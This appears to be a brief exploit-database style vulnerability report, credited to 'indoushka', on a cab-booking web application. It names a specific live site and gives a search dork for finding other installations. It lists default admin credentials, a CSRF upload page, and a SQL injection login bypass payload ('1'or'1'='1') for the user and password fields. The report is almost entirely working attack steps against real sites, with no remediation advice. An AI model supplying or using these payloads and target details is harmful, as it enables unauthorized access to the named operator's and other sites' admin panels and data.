Vulnerability reports

========================================================================
| # Title     : Cabbooking backdoor account vulnerability
| # Author    : indoushka
| # email     : [email protected]
| # Tested on : windows 8.1 Français V.(Pro)
| # Version   : N/A
| # Vendor    : http://epbitservices.com
| # Dork      : " Website Designed & Developed by EPB IT Services "
========================================================================

poc :

http://angkorcab.com/admin/index.php

user : admin 

pass : admin

CSRF upload from her :

http://angkorcab.com/admin/manage_category.php 

auth by pass :

http://angkorcab.com/login.php

user : 1'or'1'='1

Pass : 1'or'1'='1

Greetz : ===============================================================
                                                                       |
jericho * Larry W. Cashdollar * Shadow00715 * Gjoko Krstic             |
                                                                       |
========================================================================